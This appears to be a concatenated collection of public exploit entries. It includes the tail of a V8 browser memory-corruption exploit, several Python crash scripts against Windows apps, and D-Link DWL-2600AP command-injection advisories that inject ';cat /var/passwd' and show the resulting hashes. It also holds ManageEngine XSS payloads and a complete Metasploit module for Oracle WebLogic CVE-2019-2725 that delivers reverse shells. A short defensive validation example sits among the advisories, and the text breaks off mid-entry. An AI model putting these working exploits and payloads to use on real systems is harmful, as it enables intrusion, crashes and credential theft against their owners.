  let start = (BigInt(high_bytes)<<32n).to_float();
  let end = ((BigInt(high_bytes)<<32n)+0x1000000n).to_float();
  let step = 0x1000n.to_float();

  for (let j = start; j < end; j += step) {
    float_boundary[0] = j;
    if (float_arr.indexOf(j, 30) == 30) {
      return [j, smi_boundary, float_boundary, tmp];
    }
  }
}

for (let i = 0; i < 10; i++) {
  leak('', [1], [1.1]);
}

let res = leak('100000', [1], [1.1]);
if (res == undefined) {
  location.reload();
  return;
}
let ab_addr = res[0].to_int();

console.log(`Buf at ${ab_addr.hex()}`);

let u64 = new BigUint64Array(ab);

function write_map(offset, type) {
  u64[offset/8n + 0x0n] = 0x12345n;
  u64[offset/8n + 0x1n] = 0x190000002900a804n | (type << 32n);
  u64[offset/8n + 0x2n] = 0x92003ffn;  // bitfield 3
  u64[offset/8n + 0x3n] = 0x41414141n; // prototype
  u64[offset/8n + 0x4n] = 0x41414141n; // constructor or back ptr
  u64[offset/8n + 0x5n] = 0n;          // transitions or proto info
  u64[offset/8n + 0x6n] = 0x41414141n; // instance descriptors
  u64[offset/8n + 0x7n] = 0n;          // layout descriptor
  u64[offset/8n + 0x8n] = 0x41414141n; // dependent code
  u64[offset/8n + 0x9n] = 0n;          // prototype validity cell
}

// SPACE_SIZE = 1<<18
// LARGE_OBJ_SIZE = (1<<17) +1

const SPACE_SIZE = 1n<<19n;
const SPACE_MASK = 0xffffffffffffffffn ^ (SPACE_SIZE-1n);

let space_start_addr = (ab_addr & SPACE_MASK) + SPACE_SIZE;
let space_start_off = space_start_addr - ab_addr;

console.log(`Space start: ${space_start_addr.hex()}`);

let free_mem = space_start_addr + 4096n;

function page_round(addr) {
  if ((addr & 0xfffn) == 0n) {
    return addr;
  }
  return (addr + 0x1000n) & 0xfffffffffffff000n;
}

function u64_offset(addr) {
  return (addr - ab_addr) / 8n;
}

class V8String {
  constructor(type, data) {
    let size = BigInt(data.length)*8n;
    this.addr = free_mem;
    free_mem += page_round(size);
    this.map = free_mem;
    free_mem += page_round(0x9n*8n);
    this.off = u64_offset(this.addr);
    u64[this.off] = this.map|1n;
    for (let i = 0n; i < data.length; i++) {
      u64[this.off + 1n + i] = data[i];
    }
    let map_off = u64_offset(this.map);
    u64[map_off + 0x0n] = 0x12345n;
    u64[map_off + 0x1n] = 0x190000002900a804n | (type << 32n);
    u64[map_off + 0x2n] = 0x92003ffn;  // bitfield 3
    u64[map_off + 0x3n] = 0x41414141n; // prototype
    u64[map_off + 0x4n] = 0x41414141n; // constructor or back ptr
    u64[map_off + 0x5n] = 0n;          // transitions or proto info
    u64[map_off + 0x6n] = 0x41414141n; // instance descriptors
    u64[map_off + 0x7n] = 0n;          // layout descriptor
    u64[map_off + 0x8n] = 0x41414141n; // dependent code
    u64[map_off + 0x9n] = 0n;          // prototype validity cell
  }
}

class ConsString extends V8String {
  constructor(size, left, right) {
    super(0x29n, [(size<<32n) | 0x00000003n, left|1n, right|1n]);
  }
}

class SliceString extends V8String {
  constructor(parent_string, offset, len=0x100n) {
    super(0x2bn, [(len<<32n) | 0x00000003n, parent_string|1n, offset<<32n]);
  }
}

class SeqString extends V8String {
  constructor(data) {
    super(0x08n, [(BigInt(data.length*8) << 32n | 0xdf61f02en)].concat(data));
  }
}

// object in young generation == space+8 has one of these bits set: 0x18
u64[space_start_off/8n + 0x1n] = 0x18n;

LEAK_STRING_SZ = 0x1;

let seq_string = new SeqString([0x4141414141414141n]);
let root_string = new ConsString(BigInt(LEAK_STRING_SZ), seq_string.addr, seq_string.addr);

function foo(i, arr, to_search, to_copy) {
  arr.__defineSetter__(i, ()=>{});
  let a = [1.1, to_copy];
  let boundary = [to_search];
  return [arr.indexOf(to_search), a, boundary];
}

for (let i = 0; i < 100000; i++) {
  foo('', [Array], '', 1.1);
}

function doit(to_search, to_copy) {
  return foo('100000', [Array], to_search, to_copy)[0];
}

doit('A'.repeat(LEAK_STRING_SZ), (root_string.addr|1n).to_float());
let corrupted_array = [1.1, 1.2, 1.3];

console.log(`string at = ${u64[root_string.off+2n].hex()}`);

let corrupted_array_addr = u64[root_string.off+2n]+0x40n;
let backing_store_sz_addr = corrupted_array_addr + 0x38n;


GC_STRING_SZ = 0x30000000;

u64[space_start_off/8n + 0x0n] = 0x1234n;
// object in young generation == space+8 has one of these bits set: 0x18
u64[space_start_off/8n + 0x1n] = 0xff000n;
// marking bitmap pointer
u64[space_start_off/8n + 0x2n] = backing_store_sz_addr + 4n - (0x70n*0x4n);
u64[space_start_off/8n + 0x6n] = space_start_addr;
// incremental_marking ptr
u64[space_start_off/8n + 0xf7n] = space_start_addr;

seq_string = new SeqString([0x4141414141414141n]);
root_string = new ConsString(BigInt(GC_STRING_SZ), seq_string.addr, seq_string.addr);
doit('A'.repeat(GC_STRING_SZ), (root_string.addr|1n).to_float());
corrupted_array[100] = 1.1;
console.log('=== OOB array leak ===');
for (let i = 0; i < 100; i++) {
  console.log(corrupted_array[i].hex());
}
</script>
            
# -*- coding: utf-8 -*-
# Exploit Title: Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe
# Version: 2.17
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "Selfie_resize.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open Selfie Studio
# 4.- Go to 'Image' > 'Resize Image...' 
# 5.- Paste clipboard in the 'New Width/New Height' field
# 6.- Click OK
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
            
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.

Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)


Exploitation Technique:
=======================
Local


Severity Level:
===============
HIGH

CVE: CVE-2019-20499
CVE: CVE-2019-20500
CVE: CVE-2019-20501


Base Score (CVSS):
===============
7.8

===============
Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=config_restore

Vulnerable POST Form Data Parameter:
[+] configRestore
[+] configServerip
===========================
Device Firmware version :
[+] 4.2.0.15

Hardware Version :
[+] A1

Device name :
[+] D-Link AP

Product Identifier : 
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
There is no input validation on the POST form data parameter "configRestore"
or on the form data parameter "configServerip" (the input is passed directly to the TFTP command), which allows attackers to execute arbitrary operating system commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the panel.
For security demonstration or to reproduce the vulnerability, follow the information in the provided attachment Screenshot2.jpg.


--- PoC Session Logs ---
POST /admin.cgi?action=config_restore HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 357
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; 
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_restore
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E

------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="optprotocol"

up
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configRestore"

;whoami;
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configServerip"

;cat /var/passwd;cat /var/passwd
------WebKitFormBoundary4ZAwHsdySFjwNXxE--


----------->Response----------->

HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
	-l FILE	Local FILE
	-r FILE	Remote FILE
	-g	Get file
	-p	Put file
	-b SIZE	Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note : for testing put the values in the fields like this : 
;command1;same_command1;command2;command2


----+Discovered By Raki Ben Hamouda----+


Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.

Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)


Exploitation Technique:
=======================
Local


Severity Level:
===============
HIGH

Base Score (CVSS):
===============
7.8

===============
Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=config_save

Vulnerable POST Form Data Parameter:
[+] configBackup
[+] downloadServerip
==========================
Device Firmware version :
[+] 4.2.0.15

Hardware Version :
[+] A1

Device name :
[+] D-Link AP

Product Identifier : 
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote or local authenticated attackers.
There is no input validation on the POST form data parameter "configBackup"
or on the form data parameter "downloadServerip" (the input is passed directly to the TFTP command), which allows attackers to execute arbitrary operating system commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the panel.
For security demonstration or to reproduce the vulnerability, follow the information in the provided attachment Screenshot3.jpg.

--- PoC Session Logs ---
POST /admin.cgi?action=config_save HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_save
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E

check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd


----------->Response----------->

HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
	-l FILE	Local FILE
	-r FILE	Remote FILE
	-g	Get file
	-p	Put file
	-b SIZE	Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
sh: .xml: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note : for testing put the values in the fields like this : 
;command1;same_command1;command2;etc...


----+Discovered By Raki Ben Hamouda----+


Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)

Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.

Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)


Exploitation Technique:
=======================
Local


Severity Level:
===============
HIGH

Base Score (CVSS):
===============
7.8

===============
Request Method(s):
[+] POST

URL Path :
[+] /admin.cgi?action=upgrade

Vulnerable POST Form Data Parameter:
[+] firmwareRestore
[+] firmwareServerip

===========================
Device Firmware version :
[+] 4.2.0.15

Hardware Version :
[+] A1

Device name :
[+] D-Link AP

Product Identifier : 
[+] WLAN-EAP

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
There is no input validation on the POST form data parameter "firmwareRestore"
or on the form data parameter "firmwareServerip" (the input is passed directly to the TFTP command), which allows attackers to execute arbitrary operating system commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the panel.
For security demonstration or to reproduce the vulnerability, follow the information in the provided attachment Screenshot1.jpg.

--- PoC Session Logs ---

POST /admin.cgi?action=upgrade HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 525
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: xxxxxxxxw
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=upgrade
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E

------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="optprotocol"

up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareRestore"

;whoami;whoami
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareServerip"

;cat /var/passwd;cat /var/passwd
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"

up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL--

----------->Response----------->

HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8

/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:
	-l FILE	Local FILE
	-r FILE	Remote FILE
	-g	Get file
	-p	Put file
	-b SIZE	Transfer blocks of SIZE octets

sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false

Note : for testing put the values in the fields like this : 
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
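
The three D-Link advisories above share one root cause: form fields reach the TFTP command line unvalidated. The following is an added defensive example, not the vendor's firmware code and not part of the advisories, showing strict validation plus an argv list that no shell parses. The string-built command in `vulnerable_command`, the IPv4-only rule, the file-name allowlist and all helper names are assumptions made for illustration.

```python
import ipaddress
import re

# File names accepted for a config or firmware transfer: one path component,
# no shell metacharacters, and no leading "-" or "." (a leading dash would be
# parsed by tftp as an option, a leading dot allows ".." traversal).
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9._-]{0,63}")

TFTP_BIN = "/usr/bin/tftp"  # path shown in the advisories' response output


class RejectedInput(ValueError):
    """A form field that must not reach the tftp command line."""


def vulnerable_command(server_ip, remote_file):
    # ASSUMED shape of the flaw, for contrast only (never executed here):
    # the advisories say the fields are passed directly to the TFTP command,
    # so a value containing ";" ends the tftp call and starts a new command.
    return "%s -g -r %s %s" % (TFTP_BIN, remote_file, server_ip)


def validate_server_ip(value):
    # Assumption: the "...Serverip" fields only ever need a dotted IPv4 address.
    if not isinstance(value, str):
        raise RejectedInput("not an IPv4 address: %r" % (value,))
    try:
        return str(ipaddress.IPv4Address(value))
    except ValueError:
        raise RejectedInput("not an IPv4 address: %r" % (value,)) from None


def validate_file_name(value):
    if not isinstance(value, str) or not SAFE_NAME.fullmatch(value):
        raise RejectedInput("not a plain file name: %r" % (value,))
    return value


def build_tftp_argv(direction, server_ip, remote_file, local_path):
    """Return an argv list for BusyBox tftp, or raise RejectedInput.

    The list is meant for subprocess.run(argv, shell=False): every element is
    one argument, so no shell ever parses the user-supplied strings.
    local_path is chosen by the server, never taken from the request.
    """
    flag = {"get": "-g", "put": "-p"}.get(direction)
    if flag is None:
        raise RejectedInput("unknown direction: %r" % (direction,))
    host = validate_server_ip(server_ip)
    name = validate_file_name(remote_file)
    return [TFTP_BIN, flag, "-r", name, "-l", local_path, host]


def audit_fields(fields):
    """Map each rejected field name to the reason it was rejected."""
    checks = {"file": validate_file_name, "ip": validate_server_ip}
    rejected = {}
    for name, (kind, value) in fields.items():
        try:
            checks[kind](value)
        except RejectedInput as exc:
            rejected[name] = str(exc)
    return rejected


# Field values copied from the "Restore Configuration" session log above.
ADVISORY_FIELDS = {
    "configRestore": ("file", ";whoami;"),
    "configServerip": ("ip", ";cat /var/passwd;cat /var/passwd"),
}

if __name__ == "__main__":
    # Constructed benign request: accepted and turned into an argv list.
    print(build_tftp_argv("get", "192.168.1.10", "backup-2019.xml",
                          "/tmp/restore.xml"))
    # The advisory's field values: both are rejected before any command runs.
    for field, reason in audit_fields(ADVISORY_FIELDS).items():
        print(field, "->", reason)
```

Validation and the argv list are both needed: the allowlist stops option injection through a leading dash, and the argv list removes the shell that interprets `;` in the first place.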
            
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "TwistedBrush_recorder.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open TwistedBrush Pro Studio
# 4.- Go to 'Record' > 'Script Recorder...' 
# 5.- Paste clipboard in the 'Description' field
# 6.- Click 'Brush' button
# 7.- Crashed

buffer = "\x41" * 500000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
            
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "TwistedBrush_player.py", it will create a new file "sample.srp"
# 2.- Open TwistedBrush Pro Studio
# 3.- Go to 'Record' > 'Script Player...' 
# 4.- Click 'Import' button, select the 'sample.srp' file created and click 'Open' button
# 5.- Crashed

buffer = "\x41" * 500000
f = open ("sample.srp", "w")
f.write(buffer)
f.close()
            
# -*- coding: utf-8 -*-
# Exploit Title: TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)
# Date: 13/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.pixarra.com
# Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe
# Version: 24.06
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "TwistedBrush _resize.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open TwistedBrush Pro Studio
# 4.- Go to 'Image' > 'Resize Image...' 
# 5.- Paste clipboard in the 'New Width/New Height' field
# 6.- Click OK
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()
            
[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?


[+] TimeLine
	[-] Nov 23, 2018	Reported
	[-] Nov 26, 2018	Triaged
	[-] Dec 27, 2018 	Fixed
	[-] May 08, 2019	Public Disclosure

[+] Description:
	Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has multiple XSS vulnerabilities

[+] POC

[-] Employee search form

POST /EmployeeSearch.cc?actionId=Search HTTP/1.1

searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
searchType parameter:
searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=


2- Employee Search – ascending parameter

/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1

selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=


3- EmpSearch.cc - searchString parameter

POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1

&adscsrf=

4- Stored XSS in self-update layout implementation.

/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
Insert the following payload into Mobile Number field, and save
Payload: 11111111]";a=alert,a(31337)//
Code execute here:
/Enrollment.do?selectedTab=Enrollment


[+] Assigned CVE:  CVE-2018-20484,CVE-2018-20485
[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html
            
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
      'Description' => %q{
        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
        to execute code on the vulnerable host.
      },
      'Author' =>
        [
        'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>',  # Metasploit Module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2019-2725'],
          ['CNVD-C', '2019-48814'],
          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
          ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
        ],
      'Privileged' => false,
      'Platform' => %w{ unix win solaris },
      'Targets' =>
        [
          [ 'Unix',
            'Platform' => 'unix',
            'Arch' => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
          ],
          [ 'Windows',
            'Platform' => 'win',
            'Arch' => [ARCH_X64, ARCH_X86],
            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
          ],
          [ 'Solaris',
            'Platform' => 'solaris',
            'Arch' => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
            'Payload' => {
              'Space'       => 2048,
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'generic perl telnet',
                }
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DefaultOptions' =>
        {
          'WfsDelay' => 12
        },
      'DisclosureDate' => 'Apr 23 2019'))

    register_options(
      [
        Opt::RPORT(7001),
        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
        OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
      ]
    )
  end

  def check
    res = send_request_cgi(
      'uri'      => normalize_uri(datastore['WSPATH']),
      'method'   => 'POST',
      'ctype'    => 'text/xml',
      'headers'  => {'SOAPAction' => '' }
    )

    if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
      vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
      vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
      Exploit::CheckCode::Vulnerable
    elsif res && res.code != 202
      vprint_status("The target returned a non-vulnerable HTTP code")
      Exploit::CheckCode::Safe
    elsif res.nil?
      vprint_status("The target did not respond in an expected way")
      Exploit::CheckCode::Unknown
    else
      vprint_status("The target returned HTTP code: #{res.code}")
      vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
      Exploit::CheckCode::Unknown
    end
  end

  def exploit
    print_status("Generating payload...")
    case target.name
    when 'Windows'
      string0_cmd = 'cmd.exe'
      string1_param = '/c'
      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
    when 'Unix','Solaris'
      string0_cmd = '/bin/bash'
      string1_param = '-c'
      shell_payload = payload.encoded
    end

    random_action = rand_text_alphanumeric(20)
    random_relates = rand_text_alphanumeric(20)

    soap_payload =  %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
    soap_payload <<   %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
    soap_payload <<   %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
    soap_payload <<   %Q|<soapenv:Header>|
    soap_payload <<     %Q|<wsa:Action>#{random_action}</wsa:Action>|
    soap_payload <<     %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
    soap_payload <<     %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
    soap_payload <<       %Q|<void class="java.lang.ProcessBuilder">|
    soap_payload <<         %Q|<array class="java.lang.String" length="3">|
    soap_payload <<           %Q|<void index="0">|
    soap_payload <<             %Q|<string>#{string0_cmd}</string>|
    soap_payload <<           %Q|</void>|
    soap_payload <<           %Q|<void index="1">|
    soap_payload <<             %Q|<string>#{string1_param}</string>|
    soap_payload <<           %Q|</void>|
    soap_payload <<           %Q|<void index="2">|
    soap_payload <<             %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
   #soap_payload <<             %Q|<string>#{xml_encode(shell_payload)}</string>|
    soap_payload <<           %Q|</void>|
    soap_payload <<         %Q|</array>|
    soap_payload <<       %Q|<void method="start"/>|
    soap_payload <<       %Q|</void>|
    soap_payload <<     %Q|</work:WorkContext>|
    soap_payload <<   %Q|</soapenv:Header>|
    soap_payload <<   %Q|<soapenv:Body>|
    soap_payload <<     %Q|<asy:onAsyncDelivery/>|
    soap_payload <<   %Q|</soapenv:Body>|
    soap_payload << %Q|</soapenv:Envelope>|

    uri = normalize_uri(datastore['WSPATH'])
    if uri.nil?
      datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
    end

    print_status("Sending payload...")

    begin
      res = send_request_cgi(
        'uri'      => uri,
        'method'   => 'POST',
        'ctype'    => 'text/xml',
        'data'     => soap_payload,
        'headers'  => {'SOAPAction' => '' }
      )
    rescue Errno::ENOTCONN
      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
    end

    if res.nil?
      fail_with(Failure::Unreachable, "No response from host")
    elsif res && res.code != 202
      fail_with(Failure::UnexpectedReply, "Exploit failed. Host responded with HTTP code #{res.code} instead of HTTP code 202")
    end
  end
end
            
# -*- coding: utf-8 -*-
# Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.jetaudio.com/
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
# Version: 8.1.7 
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt"
# 2.- Copy the text from the generated ConvertVideo.txt file to clipboard
# 3.- Open JetVidCnv.exe or Video Converter
# 4.- Click on the 'Add Files...' button and select a video file
# 5.- Paste clipboard in the field "File Naming"
# 6.- Click on the 'Preview' button
# 7.- Crashed

buffer = "\x41" * 512
f = open ("ConvertVideo.txt", "w")
f.write(buffer)
f.close()
            
# -*- coding: utf-8 -*-
# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.jetaudio.com/
# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
# Version: 2.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
# 2.- Copy the text from the generated LyricMaker.txt file to clipboard
# 3.- Open JetLyric.exe or Lyric Maker
# 4.- Paste clipboard in the field "Title"
# 5.- Go to file -> Save Lyric...
# 6.- Save the file with any name, e.g 'sample.jlr'
# 7.- Crashed

buffer = "\x41" * 5000
f = open ("LyricMaker.txt", "w")
f.write(buffer)
f.close()
            
# -*- coding: utf-8 -*-
# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://lyricvideocreator.com/
# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe
# Version: 2.1
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3"
# 2.- Open LyricVideoCreator.exe
# 3.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button
# 4.- Crashed

buffer = "\x41" * 5000
f = open ("sample.mp3", "w")
f.write(buffer)
f.close()
            
# -*- coding: utf-8 -*-
# Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
# Date: 09/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com
# Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
# Version: 2.2
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
# 2.- Copy the text from the generated SpotIM.txt file to clipboard
# 3.- Open SpotIM
# 4.- Select "Register" > "Enter Registration Code..."
